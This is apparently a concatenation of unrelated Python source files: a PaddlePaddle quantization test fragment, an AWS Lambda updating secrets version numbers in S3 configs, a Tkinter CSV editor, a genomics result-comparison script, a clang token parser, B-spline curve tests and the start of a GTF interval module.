                            batch_id, acc_top1.numpy(), acc_top5.numpy()))
        train_reader = paddle.batch(paddle.dataset.mnist.train(),
                                    batch_size=512,
                                    drop_last=True)
        test_reader = paddle.batch(paddle.dataset.mnist.test(), batch_size=512)
        train(lenet)
        test(lenet)
    def test_quant_aware_training(self):
        # Run once under eager mode and once under the default mode.
        with _test_eager_guard():
            self.func_quant_aware_training()
        self.func_quant_aware_training()
class TestUserDefinedWeightPreprocess(TestUserDefinedActPreprocess):
    """Same scenario with PACT plugged in as the weight preprocess layer."""
    def setUp(self):
        _logger.info("test weight_preprocess")
        self.imperative_qat = ImperativeQuantAware(weight_preprocess_layer=PACT)
class TestUserDefinedActQuantize(TestUserDefinedActPreprocess):
    """Same scenario with CustomQAT as the activation quantize layer."""
    def setUp(self):
        _logger.info("test act_quantize")
        self.imperative_qat = ImperativeQuantAware(act_quantize_layer=CustomQAT)
class TestUserDefinedWeightQuantize(TestUserDefinedActPreprocess):
    """Same scenario with CustomQAT as the weight quantize layer."""
    def setUp(self):
        _logger.info("test weight_quantize")
        self.imperative_qat = ImperativeQuantAware(
            weight_quantize_layer=CustomQAT)
# Standard unittest entry point.
if __name__ == '__main__':
    unittest.main()
|
<reponame>PRX/Infrastructure<filename>secrets/lambdas/secrets-s3-update/lambda_function.py
# Invoked by: S3 Object Change
# Returns: Error or status message
#
# Environment variables for applications are stored in encrypted s3 files.
# When those files are updated, the env config file should be updated with the
# current object version number for the application for that app and env
import zipfile
import boto3
import traceback
import json
import uuid
import os
from botocore.client import Config
#########
# helpers
#########
# SigV4 signing is configured explicitly -- presumably required for the
# encrypted objects this bucket holds (TODO confirm).
s3 = boto3.client("s3", config=Config(signature_version="s3v4"))
# Short environment names (as used in S3 key paths) -> full names.
abbreviations = {"dev": "development", "stag": "staging", "prod": "production"}
def env_abbr_to_full(abbr):
    """Expand an environment abbreviation ('dev', 'stag', 'prod') to its
    full name; raises KeyError for unknown abbreviations."""
    full_name = abbreviations[abbr]
    return full_name
def temp_file_path():
    """Return a fresh, collision-safe scratch path under /tmp."""
    return f"/tmp/{uuid.uuid4()}"
##############
# main methods
##############
def get_record_info(record):
    """Extract app/env/file and the object's current version from one
    S3 event record.

    Assumes keys are laid out as ``<app>/<env>/<file>``.
    NOTE(review): head_object returns the *latest* VersionId rather than the
    version from the event record itself -- confirm this is intended.
    """
    bucket = record["s3"]["bucket"]["name"]
    key = record["s3"]["object"]["key"]
    app, env, file = key.split("/")
    # print(app, env, file)
    version = s3.head_object(Bucket=bucket, Key=key)["VersionId"]
    return {"app": app, "env": env, "file": file, "version": version}
def get_secrets_changes(event):
    """Collect change records for 'secrets' files from an S3 event,
    grouped by environment abbreviation."""
    grouped = {}
    for record in event["Records"]:
        info = get_record_info(record)
        if info["file"] != "secrets":
            continue
        env = info["env"]
        if env not in grouped:
            grouped[env] = []
        grouped[env].append(info)
    return grouped
def get_config(env):
    """Download and parse the template-config JSON for *env*.

    The config lives as ``<environment>.json`` inside a zip archive stored
    in the infrastructure config bucket.
    """
    environment = env_abbr_to_full(env)
    source_bucket = os.environ["INFRASTRUCTURE_CONFIG_BUCKET"]
    source_key = os.environ["INFRASTRUCTURE_CONFIG_%s_KEY" % environment.upper()]
    archive_path = temp_file_path()
    print("...Getting %s config: %s/%s..." % (environment, source_bucket, source_key))
    print("...Writing file to %s..." % archive_path)
    s3.download_file(source_bucket, source_key, archive_path)
    with zipfile.ZipFile(archive_path, "r") as archive:
        env_config = json.load(archive.open(environment + ".json"))
    return env_config
def update_config(env, changes):
    """Apply the secrets-version *changes* to the environment's template
    config and return the updated config dict."""
    env_config = get_config(env)
    params = env_config["Parameters"]
    for change in changes:
        app_key = change["app"].title() + "SecretsVersion"
        current_val = params.get(app_key)
        new_val = change["version"]
        print("...Set %s from %s to %s..." % (app_key, current_val, new_val))
        params[app_key] = new_val
    return env_config
def upload_config(env, config):
    """Zip *config* as ``<environment>.json`` and upload it back to the
    infrastructure config bucket, replacing the existing archive.
    """
    print("...Generating template config version...")
    body = json.dumps(config)
    archive_path = temp_file_path()
    environment = env_abbr_to_full(env)
    # Context manager ensures the archive is closed (and fully flushed)
    # even if writestr raises; the original leaked the handle on error.
    with zipfile.ZipFile(archive_path, mode="w") as archive:
        archive.writestr(environment + ".json", body, compress_type=zipfile.ZIP_DEFLATED)
    source_bucket = os.environ["INFRASTRUCTURE_CONFIG_BUCKET"]
    source_key = os.environ["INFRASTRUCTURE_CONFIG_%s_KEY" % environment.upper()]
    s3.upload_file(archive_path, source_bucket, source_key)
    print("...Wrote update to %s/%s..." % (source_bucket, source_key))
def lambda_handler(event, context):
    """Entry point: propagate secrets version changes into each affected
    environment's template config.

    NOTE(review): every exception is swallowed after logging, so the Lambda
    always reports success and failed updates will not be retried --
    confirm that this best-effort behaviour is intentional.
    """
    try:
        print("Starting secrets update...")
        # get all the secrets changes, keyed by env
        changes = get_secrets_changes(event)
        # for each env, update with change, then upload zipped file
        for env in changes.keys():
            upload_config(env, update_config(env, changes[env]))
        return "...Done"
    except Exception as e:
        print("Function failed due to exception.")
        print(e)
        traceback.print_exc()
################################################################################
# local test
################################################################################
# Fabricated S3 event for running the handler from a dev machine; only the
# fields read by get_record_info are populated.
if os.environ.get("LOCAL_TEST"):
    os.environ[
        "INFRASTRUCTURE_CONFIG_DEVELOPMENT_KEY"
    ] = "template-config-development.zip"
    os.environ["INFRASTRUCTURE_CONFIG_BUCKET"] = "prx-infrastructure-us-east-1-config"
    test_event = {
        "Records": [
            {
                "s3": {
                    "object": {"key": "castle/dev/secrets"},
                    "bucket": {"name": "prx_test_aws_secrets-secrets"},
                }
            }
        ]
    }
    test_context = {}
    lambda_handler(test_event, test_context)
|
# pylint: disable=C0103,C0111,W0614,W0401,C0200,C0325
from Tkinter import *
import tkMessageBox
import tkFileDialog
import tkFont
import csv
##
# CSV GUI Editor written in python using tkinter
# - A lightweight csv editor
# - (c) 2017 <NAME> <EMAIL>
##
##
# TODO: Add + / - buttons to create/remove rows & coloumns
# TODO: Add resizing of cells
##
class Application(Frame):
    """Grid-of-Text-widgets CSV editor frame (Python 2 / Tkinter).

    ``currentCells`` is a 2-D list (rows x columns) of Text widgets;
    ``cellList`` is the flat list of every live widget (used for teardown).
    """
    # NOTE(review): these are class attributes shared by all instances;
    # fine for this single-instance app, but worth knowing.
    cellList = []
    currentCells = []
    currentCell = None
    def __init__(self, master=None):
        Frame.__init__(self, master)
        self.grid()
        self.createDefaultWidgets()
    def focus_tab(self, event):
        """Move focus to the next widget in tab order."""
        event.widget.tk_focusNext().focus()
        return "break"
    def focus_sh_tab(self, event):
        """Move focus to the previous widget in tab order."""
        event.widget.tk_focusPrev().focus()
        return "break"
    def focus_right(self, event):
        """Focus the cell to the right, wrapping to column 0 at the end."""
        #event.widget.tk_focusNext().focus()
        widget = event.widget.focus_get()
        for i in range(len(self.currentCells)):
            for j in range(len(self.currentCells[0])):
                if widget == self.currentCells[i][j]:
                    if(j >= len(self.currentCells[0]) - 1 ):
                        j = -1
                    self.currentCells[i][j+1].focus()
        return "break"
    def focus_left(self, event):
        """Focus the cell to the left, wrapping to the last column."""
        #event.widget.tk_focusNext().focus()
        widget = event.widget.focus_get()
        for i in range(len(self.currentCells)):
            for j in range(len(self.currentCells[0])):
                if widget == self.currentCells[i][j]:
                    if(j == 0):
                        j = len(self.currentCells[0])
                    self.currentCells[i][j-1].focus()
        return "break"
    def focus_up(self, event):
        """Focus the cell above, wrapping to the bottom row.

        NOTE(review): the ``i < 0`` guard is never true (i comes from
        range()); the wrap actually happens via Python's negative indexing
        when i == 0.
        """
        #event.widget.tk_focusNext().focus()
        widget = event.widget.focus_get()
        for i in range(len(self.currentCells)):
            for j in range(len(self.currentCells[0])):
                if widget == self.currentCells[i][j]:
                    if(i < 0):
                        i = len(self.currentCells)
                    self.currentCells[i-1][j].focus()
        return "break"
    def focus_down(self, event):
        """Focus the cell below, wrapping to the top row."""
        #event.widget.tk_focusNext().focus()
        widget = event.widget.focus_get()
        for i in range(len(self.currentCells)):
            for j in range(len(self.currentCells[0])):
                if widget == self.currentCells[i][j]:
                    if( i >= len(self.currentCells) - 1):
                        i = -1
                    self.currentCells[i+1][j].focus()
        return "break"
    def selectall(self, event):
        """Select the whole contents of the focused cell (Ctrl-A)."""
        event.widget.tag_add("sel", "1.0", "end")
        event.widget.mark_set(INSERT, "1.0")
        event.widget.see(INSERT)
        return "break"
    def saveFile(self, event):
        """Keyboard shortcut wrapper for saveCells (Ctrl-S)."""
        self.saveCells()
    # TODO: Create bind for arrow keys and enter
    def createDefaultWidgets(self):
        """Build the default empty 4x6 grid of editable cells."""
        w, h = 7, 1
        self.sizeX = 4
        self.sizeY = 6
        self.defaultCells = []
        for i in range(self.sizeY):
            self.defaultCells.append([])
            for j in range(self.sizeX):
                self.defaultCells[i].append([])
        for i in range(self.sizeY):
            for j in range(self.sizeX):
                tmp = Text(self, width=w, height=h)
                tmp.bind("<Tab>", self.focus_tab)
                tmp.bind("<Shift-Tab>", self.focus_sh_tab)
                tmp.bind("<Return>", self.focus_down)
                tmp.bind("<Shift-Return>", self.focus_up)
                tmp.bind("<Right>", self.focus_right)
                tmp.bind("<Left>", self.focus_left)
                tmp.bind("<Up>", self.focus_up)
                tmp.bind("<Down>", self.focus_down)
                tmp.bind("<Control-a>", self.selectall)
                tmp.bind("<Control-s>", self.saveFile)
                #TODO: Add resize check on column when changing focus
                tmp.insert(END, "")
                tmp.grid(padx=0, pady=0, column=j, row=i)
                self.defaultCells[i][j] = tmp
                self.cellList.append(tmp)
        self.defaultCells[0][0].focus_force()
        self.currentCells = self.defaultCells
        self.currentCell = self.currentCells[0][0]
    # TODO: Add buttons to create new rows/columns
    def newCells(self):
        """Replace the current grid with a fresh default grid."""
        self.removeCells()
        self.createDefaultWidgets()
    def removeCells(self):
        """Destroy every cell widget.

        NOTE(review): the list is mutated while being iterated, which skips
        elements per pass; the outer while loop compensates by re-scanning
        until the list is empty.
        """
        while(len(self.cellList) > 0):
            for cell in self.cellList:
                # print str(i) + str(j)
                cell.destroy()
                self.cellList.remove(cell)
    def loadCells(self):
        """Prompt for a CSV file and rebuild the grid from its contents."""
        filename = tkFileDialog.askopenfilename(initialdir=".", title="Select file",
                                                filetypes=(("csv files", "*.csv"), ("all files", "*.*")))
        ary = []
        col = -1
        rows = []
        # get array size & get contents of rows
        with open(filename, "rb") as csvfile:
            rd = csv.reader(csvfile, delimiter=",", quotechar='"')
            for row in rd:
                ary.append([])
                col = len(row)
                rows.append(row)
        # create the array
        for i in range(len(ary)):
            for j in range(col):
                ary[i].append([])
        # fill the array
        for i in range(len(ary)):
            for j in range(col):
                # print rows[i][j]
                ary[i][j] = rows[i][j]
        self.removeCells()
        # get the max width of the cells
        mx = 0
        for i in range(len(ary)):
            for j in range(len(ary[0])):
                if(len(ary[i][j]) >= mx):
                    mx = len(ary[i][j])
        w = mx
        loadCells = []
        for i in range(len(ary)):
            loadCells.append([])
            for j in range(len(ary[0])):
                loadCells[i].append([])
        # create the new cells
        for i in range(len(ary)):
            for j in range(len(ary[0])):
                tmp = Text(self, width=w, height=1)
                tmp.bind("<Tab>", self.focus_tab)
                tmp.bind("<Shift-Tab>", self.focus_sh_tab)
                tmp.bind("<Return>", self.focus_down)
                tmp.bind("<Shift-Return>", self.focus_up)
                tmp.bind("<Right>", self.focus_right)
                tmp.bind("<Left>", self.focus_left)
                tmp.bind("<Up>", self.focus_up)
                tmp.bind("<Down>", self.focus_down)
                tmp.bind("<Control-a>", self.selectall)
                tmp.bind("<Control-s>", self.saveFile)
                tmp.insert(END, ary[i][j])
                # First row is rendered as a flat, bold header.
                if(i == 0):
                    tmp.config(font=("Helvetica", 10, tkFont.BOLD))
                    tmp.config(relief=FLAT, bg=app.master.cget('bg'))
                loadCells[i][j] = tmp
                tmp.focus_force()
                self.cellList.append(tmp)
                tmp.grid(padx=0, pady=0, column=j, row=i)
        self.currentCells = loadCells
        self.currentCell = self.currentCells[0][0]
    def saveCells(self):
        """Prompt for a target file and write the grid out as CSV.

        NOTE(review): values are joined with bare commas -- cell contents
        containing commas or quotes are not escaped (csv.writer would be).
        """
        filename = tkFileDialog.asksaveasfilename(initialdir=".", title="Save File", filetypes=(
            ("csv files", "*.csv"), ("all files", "*.*")), defaultextension=".csv")
        vals = []
        for i in range(len(self.currentCells)):
            for j in range(len(self.currentCells[0])):
                vals.append(self.currentCells[i][j].get(1.0, END).strip())
        with open(filename, "wb") as csvfile:
            for rw in range(len(self.currentCells)):
                row = ""
                for i in range(len(self.currentCells[0])):
                    # Flat index of the first cell of this row.
                    x = rw * len(self.currentCells[0])
                    if(i != len(self.currentCells[0]) - 1):
                        row += vals[x + i] + ","
                    else:
                        row += vals[x + i]
                csvfile.write(row + "\n")
        tkMessageBox.showinfo("", "Saved!")
# End Application Class #
# Begin functions #
def hello():
    """Pop up a message box greeting the user."""
    greeting = "Hello!"
    tkMessageBox.showinfo("", greeting)
# End functions #
### CODE ENTRY ###
# Build the application, attach the File menu, apply the default font and
# start the Tk event loop.
app = Application()
menubar = Menu(app)
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label="New", command=app.newCells) # add save dialog
# add save dialog
filemenu.add_command(label="Open", command=app.loadCells)
filemenu.add_command(label="Save as", command=app.saveCells)
filemenu.add_command(label="Exit", command=app.quit)
menubar.add_cascade(label="File", menu=filemenu)
menubar.add_command(label="Exit", command=app.quit)
app.master.title('CSV Editor')
app.master.config(menu=menubar)
default_font = tkFont.nametofont("TkTextFont")
default_font.configure(family="Helvetica")
app.option_add("*Font", default_font)
app.mainloop()
|
<filename>compare_results.py
import os
import sys
import random
import time
from random import seed, randint
import argparse
import platform
from datetime import datetime
import imp
import numpy as np
import fileinput
from itertools import product
import pandas as pd
from scipy.interpolate import griddata
from scipy.interpolate import interp2d
from os import listdir
from scipy.interpolate import griddata
import matplotlib as mpl
from Bio.PDB.Polypeptide import one_to_three
from Bio.PDB.Polypeptide import three_to_one
from Bio.PDB.PDBParser import PDBParser
from collections import defaultdict
from Bio import SeqIO
from io import StringIO
from Bio.Seq import Seq
from Bio.Alphabet import generic_dna
from helper_functions import *
parser = argparse.ArgumentParser(description="This is my playground for current project")
# parser.add_argument("protein", help="the name of protein")
# parser.add_argument("template", help="the name of template file")
parser.add_argument("-s", "--solution", type=str, default="test_nov16/GMAP_combined_nov06_post_modification_4.tsv")
parser.add_argument("-v", "--validation", type=str, default="dev_validation_set.tsv")
args = parser.parse_args()
# Append the exact command line to a log file so runs can be reproduced.
with open('cmd_compare_results.txt', 'a') as f:
    f.write(' '.join(sys.argv))
    f.write('\n')
# fileLocation = "dev_validation_set.tsv"
fileLocation = args.validation
dev_validation_set = read_result(fileLocation)
# fileLocation = "test/GMAP_combined_nov06_post_modification_3.tsv"
fileLocation = args.solution
mySolution = read_result(fileLocation)
# only consider sourceA is A for now.
# ground_truth = dev_validation_set.query("SourceA == 'B'")
ground_truth = dev_validation_set
print(len(ground_truth))
print(len(mySolution))
# Counters of correct/wrong comparisons per category, filled in below.
my_summary = {}
def compare_result(call, ground_truth, mySolution, my_summary):
    """Compare ground-truth rows whose Call equals *call* against the
    solution, printing mismatches and recording correct/wrong counts
    under ``wrong_<call>`` / ``correct_<call>`` in *my_summary*.
    """
    print(pad_with_dash(f"should be {call}"))
    count = 0
    correct_count = 0
    for i, line in ground_truth.query(f"Call == '{call}'").reset_index(drop=True).iterrows():
        # print(i)
        SourceA_Transcript_ID = line["SourceA_Transcript_ID"]
        # NOTE(review): this rebinds the *call* parameter; harmless because
        # the rows were filtered on Call == call, but worth renaming.
        call = line["Call"]
        solution = mySolution.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
        if len(solution) == 0:
            # No candidate in the solution at all.
            ref = "\t".join(line.values.astype(str))
            sol = "None"
        elif len(solution) > 1:
            # Ambiguous: solution mapped this transcript more than once.
            ref = "\t".join(line.values.astype(str))
            # print("ref:\n"+ref)
            sol = ""
            for j, one_sol in solution.iterrows():
                sol += "\t".join(one_sol.values.astype(str)) + '\n'
            # print("mySolution:\n"+sol)
        else:
            solution = solution.iloc[0]
            # Only the first 8 columns participate in the equality check.
            if np.alltrue(line.values.astype(str)[:8] == solution.values.astype(str)[:8]):
                # the all same.
                correct_count += 1
                continue
            else:
                ref = "\t".join(line.values.astype(str))
                sol = "\t".join(solution.values.astype(str))
        count += 1
        print("----------")
        print("ref:\n"+ref)
        print("mySolution:\n"+sol)
        print("----------")
    print("Correct: ", correct_count, "Wrong: ", count)
    my_summary[f"wrong_{call}"] = count
    my_summary[f"correct_{call}"] = correct_count
def compare_multiple_result(ground_truth, mySolution, my_summary):
    """Specialised comparison for the 'multiple_transcript' category, where
    one SourceA transcript legitimately maps to several SourceB transcripts.

    Counts every SourceB id present on only one side as a wrong call.
    """
    call = "multiple_transcript"
    print(pad_with_dash(f"should be {call}"))
    count = 0
    correct_count = 0
    sourceA_list = ground_truth.query(f"Call == '{call}'")["SourceA_Transcript_ID"].unique()
    for SourceA_Transcript_ID in sourceA_list:
        a = ground_truth.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
        solution = mySolution.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
        toTranscript_ground_truth = sorted(a["SourceB_Transcript_ID"])
        toTranscript_solution = sorted(solution["SourceB_Transcript_ID"])
        # False positives: solution targets not present in the ground truth.
        for toTranscript_solution_i in toTranscript_solution:
            if toTranscript_solution_i not in toTranscript_ground_truth:
                line = solution.query(f"SourceB_Transcript_ID == '{toTranscript_solution_i}'")
                assert len(line) == 1
                line = line.iloc[0]
                # print(toTranscript_solution_i, "Not exist in ground truth")
                # print(line)
                sol = "\t".join(line.values.astype(str))
                ref = ""
                print("ref:\n"+ref)
                print("mySolution:\n"+sol)
                count += 1
        # False negatives: ground-truth targets missing from the solution.
        for toTranscript_ground_truth_i in toTranscript_ground_truth:
            if toTranscript_ground_truth_i not in toTranscript_solution:
                # print(toTranscript_ground_truth_i, "Not found in my solution")
                line = a.query(f"SourceB_Transcript_ID == '{toTranscript_ground_truth_i}'")
                assert len(line) == 1
                line = line.iloc[0]
                ref = "\t".join(line.values.astype(str))
                sol = "None"
                # sol_line = mySolution.query(f"SourceA_Transcript_ID == '{toTranscript_ground_truth_i}'")
                # sol = ""
                # for j, one_sol in sol_line.iterrows():
                #     sol += "\t".join(one_sol.values.astype(str)) + '\n'
                # try:
                #     sol = "\t".join(sol_line.values.astype(str))
                # except:
                #     print("unknown problem")
                #     print(sol_line)
                #     sol = "Error"
                print("ref:\n"+ref)
                print("mySolution:\n"+sol)
                count += 1
    # "Correct" is defined as total ground-truth rows minus the mismatches.
    correct_count = len(ground_truth.query(f"Call == '{call}'")) - count
    print("Correct: ", correct_count, "Wrong: ", count)
    my_summary[f"wrong_{call}"] = count
    my_summary[f"correct_{call}"] = correct_count
# Per-category comparisons; each call records its counters in my_summary.
compare_result("unique_transcript", ground_truth, mySolution, my_summary)
# compare_result("multiple_transcript", ground_truth, mySolution, my_summary)
compare_multiple_result(ground_truth, mySolution, my_summary)
compare_result("gene_fusion", ground_truth, mySolution, my_summary)
compare_result("absent_transcript", ground_truth, mySolution, my_summary)
compare_result("absent_gene", ground_truth, mySolution, my_summary)
compare_result("absent_genome", ground_truth, mySolution, my_summary)
print("---------------exist in reference but not in my solution-----------------")
count = 0
for i, line in ground_truth.iterrows():
    SourceA_Transcript_ID = line["SourceA_Transcript_ID"]
    call = line["Call"]
    solution = mySolution.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
    if len(solution) == 0:
        # print(SourceA_Transcript_ID, call)
        ref = "\t".join(line.values.astype(str))
        print("ref:\n"+ref)
        print("mySolution:")
        # sol = "\t".join(solution.values.astype(str))
        print("None")
        count += 1
print("Occurrence: ", count)
my_summary["exist_in_ground_truth_but_not_in_my_solution"] = count
# print("---------------matched more than one-----------------")
# count = 0
# for i, line in ground_truth.iterrows():
# SourceA_Transcript_ID = line["SourceA_Transcript_ID"]
# call = line["Call"]
# solution = mySolution.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
# if len(solution) > 1:
# ref = "\t".join(line.values.astype(str))
# print("ref:\n"+ref)
# print("mySolution:")
# for one_sol in solution.values:
# sol = "\t".join(one_sol.astype(str))
# print(sol)
# count += 1
# print("Occurrence: ", count)
# my_summary["matched_more_than_one"] = count
# print("---------------in my solution but not in reference-----------------")
# count = 0
# for i, line in mySolution.iterrows():
# SourceA_Transcript_ID = line["SourceA_Transcript_ID"]
# call = line["Call"]
# ref = ground_truth.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
# if len(ref) == 0:
# ref = "None"
# print("ref:\n"+ref)
# sol = "\t".join(line.values.astype(str))
# print("mySolution:\n"+sol)
# count += 1
# print("Occurrence: ", count)
# my_summary["in_my_solution_but_not_in_ref"] = count
# Final tally: print each counter and the grand total across categories.
print(pad_with_dash("summary"))
total = 0
for item in my_summary:
    total += my_summary[item]
    print(item, my_summary[item])
print(total)
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys, os, re
from BAClangUtils.ShellUtil import ShellUtil
class RawTokenUtil(object):
    """Parse the output of ``clang -Xclang -dump-raw-tokens`` into
    structured per-token records."""
    def __init__(self):
        super(RawTokenUtil, self).__init__()
    def __resolveLine(self, lineContent):
        """Parse one dumped-token line into a dict with keys ``content``,
        ``unCleanContent``, ``class``, ``line`` and ``column`` (0-based),
        or return None for unusable lines."""
        if lineContent == None or isinstance(lineContent, str) == False or len(lineContent) < 1:
            return None
        # Lines clang reports as 'unknown ...' tokens carry no usable info.
        if re.match("^unknown ('|\"){1,1}(.*)?$", lineContent, re.S) != None:
            return None
        tmpLineContent = lineContent
        uncleanContent = None
        # Only the first [UnClean=...] annotation is kept (note the break).
        uncleanContentFinds = re.finditer('\[UnClean=(.|\s)*?\]', tmpLineContent)
        for findItem in uncleanContentFinds:
            # +10 / -2 strip what appears to be the "[UnClean='" prefix and
            # the trailing "']" -- TODO confirm against real clang output.
            uncleanContent = tmpLineContent[findItem.start()+10: findItem.end()-2]
            break
        tmpLineContent = tmpLineContent.replace('[StartOfLine]', '')
        if uncleanContent != None:
            tmpLineContent = re.sub('\[UnClean=(.|\s)*?\]', '', tmpLineContent)
        # Collect positions of every blank/tab separator on the line.
        blankIndexs = []
        blanksRegFinds = re.finditer('( |\t)', tmpLineContent)
        for blankItem in blanksRegFinds:
            blankIndexs.append(blankItem.start())
        # Token kind is the text before the first separator; the location
        # spec (file:line:col) is the text after the last one.
        lineClass = tmpLineContent[0: blankIndexs[0]]
        locationTmp = tmpLineContent[blankIndexs[len(blankIndexs) - 1] + 1 : len(tmpLineContent) - 1]
        colonIndexs = []
        colonFinds = re.finditer(':', locationTmp)
        for colonItem in colonFinds:
            colonIndexs.append(colonItem.start())
        locationLine = int(locationTmp[colonIndexs[0] + 1: colonIndexs[1]])
        # Column is converted to 0-based here.
        locationColumn = int(locationTmp[colonIndexs[1] + 1: len(locationTmp) - 1]) - 1
        # The token's literal text sits between the first and last separator,
        # wrapped in quotes which the two substitutions below strip off.
        tmpLineContent = tmpLineContent[blankIndexs[0]: blankIndexs[len(blankIndexs) - 1]]
        tmpLineContent = re.sub('^(\t| )*?(\'|\"){1,1}', '', tmpLineContent)
        tmpLineContent = re.sub('(\'|\"){1,1}(\t| )*?$', '', tmpLineContent)
        result = {}
        result['content'] = tmpLineContent
        result['unCleanContent'] = uncleanContent if uncleanContent != None else tmpLineContent
        result['class'] = lineClass
        result['line'] = locationLine
        result['column'] = locationColumn
        return result
    def parse(self, sourcePath):
        """Run clang's raw-token dump on *sourcePath* and return a tuple
        (stdout_tokens, stderr_tokens); (None, None) on invalid input."""
        if sourcePath == None or isinstance(sourcePath, str) == False or len(sourcePath) == 0:
            return None, None
        if os.path.exists(sourcePath) == False or os.path.isdir(sourcePath) == True:
            return None, None
        cmdResult = ShellUtil.runShell('clang -Xclang -dump-raw-tokens ' + sourcePath)
        if cmdResult == None:
            return None, None
        cmdResultOutput = cmdResult['output']
        cmdResultError = cmdResult['error']
        # One token record per 'Loc=<file:line:col>' terminated chunk.
        lineRegExpress = '(.|\n|\s)*?Loc=<(.)*?:[0-9]*?:[0-9]*?>\\n'
        outputResult = []
        if cmdResultOutput != None:
            outputLineFinds = re.finditer(lineRegExpress, cmdResultOutput)
            for lineItem in outputLineFinds:
                lineContent = cmdResultOutput[lineItem.start(): lineItem.end()]
                resultTmp = self.__resolveLine(lineContent)
                if resultTmp != None:
                    outputResult.append(resultTmp)
        errorResult = []
        if cmdResultError != None:
            errorLineFinds = re.finditer(lineRegExpress, cmdResultError)
            for lineItem in errorLineFinds:
                lineContent = cmdResultError[lineItem.start(): lineItem.end()]
                resultTmp = self.__resolveLine(lineContent)
                if resultTmp != None:
                    errorResult.append(resultTmp)
        return outputResult, errorResult
import bootstrap
import numpy as np
from igakit.igalib import bsp
def test_crv_ki(PLOT=0):
    """Knot-insertion test on a quadratic rational curve (quarter circle);
    optionally plots the refined curve against the exact arc."""
    p = 2
    U = np.asarray([0,0,0, 1,1,1], dtype=float)
    n = len(U)-1-(p+1)
    Pw = np.zeros((n+1,3))
    Pw[0,:] = [0.0, 1.0, 1.0]
    Pw[1,:] = [1.0, 1.0, 1.0]
    Pw[2,:] = [1.0, 0.0, 1.0]
    # Weight sqrt(2)/2 on the middle control point makes the curve an
    # exact circular arc (cf. the cos/sin overlay below).
    Pw[1,:] *= np.sqrt(2)/2
    # Knots to insert; 0.5 twice to exercise multiplicity handling.
    X = np.asarray([0.25,0.5,0.5,.8,.9])
    Ubar, Qw = bsp.RefineKnotVector(p,U,Pw,X)
    u = np.linspace(U[0], U[-1], 31)
    Cw = bsp.Evaluate1(p,Ubar,Qw,u)
    Dw = bsp.Evaluate1(p,Ubar,Qw,Ubar)
    # Perspective divide: homogeneous (wx, wy, w) -> Cartesian (x, y).
    P = Qw[:,:2] / Qw[:,2, None]
    C = Cw[:,:2] / Cw[:,2, None]
    D = Dw[:,:2] / Dw[:,2, None]
    if not PLOT: return
    # NOTE(review): ``plt`` is a module global bound only in the __main__
    # block below; PLOT must stay 0 unless that import has run.
    plt.figure()
    plt.title("Curve - Knot Insertion")
    x1 = C[:,0]
    y1 = C[:,1]
    plt.plot(x1,y1,'.b')
    x2 = D[:,0]
    y2 = D[:,1]
    plt.plot(x2,y2,'og')
    x0 = P[:,0]
    y0 = P[:,1]
    plt.plot(x0,y0,'sr')
    # Exact quarter circle for visual reference.
    t = np.linspace(0,np.pi/2,100)
    a = np.cos(t)
    b = np.sin(t)
    plt.plot(a,b,'-k')
    plt.axis("equal")
def test_crv_de(PLOT=0):
    """Degree-elevation test on the same rational quarter circle: refine
    once, elevate degree by 2, then (optionally) plot the result."""
    p = 2
    U = np.asarray([0,0,0, 1,1,1], dtype=float)
    n = len(U)-1-(p+1)
    Pw = np.zeros((n+1,3))
    Pw[0,:] = [0.0, 1.0, 1.0]
    Pw[1,:] = [1.0, 1.0, 1.0]
    Pw[2,:] = [1.0, 0.0, 1.0]
    # sqrt(2)/2 weight -> exact circular arc.
    Pw[1,:] *= np.sqrt(2)/2
    X = np.asarray([0.5])
    U, Pw = bsp.RefineKnotVector(p,U,Pw,X)
    #t = 1
    #U, Pw = bsp.DegreeElevate(p,U,Pw,t)
    #p = p + t
    t = 2
    Uh, Qw = bsp.DegreeElevate(p,U,Pw,t)
    ph = p + t
    u = np.linspace(U[0], U[-1], 31)
    Cw = bsp.Evaluate1(ph,Uh,Qw,u)
    Dw = bsp.Evaluate1(ph,Uh,Qw,Uh)
    # Perspective divide from homogeneous to Cartesian coordinates.
    P = Qw[:,:2] / Qw[:,2, None]
    C = Cw[:,:2] / Cw[:,2, None]
    D = Dw[:,:2] / Dw[:,2, None]
    if not PLOT: return
    plt.figure()
    plt.title("Curve - Degree Elevation")
    x1 = C[:,0]
    y1 = C[:,1]
    plt.plot(x1,y1,'.b')
    x2 = D[:,0]
    y2 = D[:,1]
    plt.plot(x2,y2,'og')
    x0 = P[:,0]
    y0 = P[:,1]
    plt.plot(x0,y0,'sr')
    # Exact quarter circle for visual reference.
    t = np.linspace(0,np.pi/2,100)
    a = np.cos(t)
    b = np.sin(t)
    plt.plot(a,b,'-k')
    plt.axis("equal")
# Enable plotting only when matplotlib is importable; the numeric parts of
# both tests still run headless without it.
if __name__ == '__main__':
    try:
        from matplotlib import pylab as plt
        PLOT=1
    except ImportError:
        PLOT=0
    if 1: test_crv_ki(PLOT=PLOT)
    if 1: test_crv_de(PLOT=PLOT)
    if PLOT: plt.show()
|
# <gh_stars>0
# -*- coding: utf-8 -*-
"""
Operations on genomic intervals stored in GTF file
note:
- all the exons of a gene should be on the same strand. Genes with exons trans-
spliced from the other strand, like mod(mdg4) in D. melanogaster, should be
excluded (before or after).
- stop codon is not part of the CDS, at least for Ensembl GTF
-----------------------------------------------------------------
@author: zh (mt1022)
@date: Fri Aug 27 2021
"""
import sys
import argparse
import re
import gzip
import fileinput
import csv
from dataclasses import dataclass
from typing import List
###############################################################################
# class definiton #############################################################
###############################################################################
@dataclass
class Region:
    """Closed, 1-based genomic interval [start, end]."""
    start: int
    end: int

    def __post_init__(self):
        # reject inverted intervals as early as possible
        if self.end < self.start:
            raise ValueError('Invalid region boundary!')

    def __len__(self):
        # bounds are inclusive: len(Region(3, 5)) == 3
        return self.end - self.start + 1
@dataclass
class Gene:
    """Minimal gene record shared by all of the gene's transcripts."""
    gene_id: str
    chrom: str = ''    # chromosome/contig name (GTF column 1); empty until parsed
    strand: str = '+'  # '+' or '-' (GTF column 7)
class Transcript:
    """A transcript assembled from GTF 'exon', 'CDS' and 'stop_codon' rows.

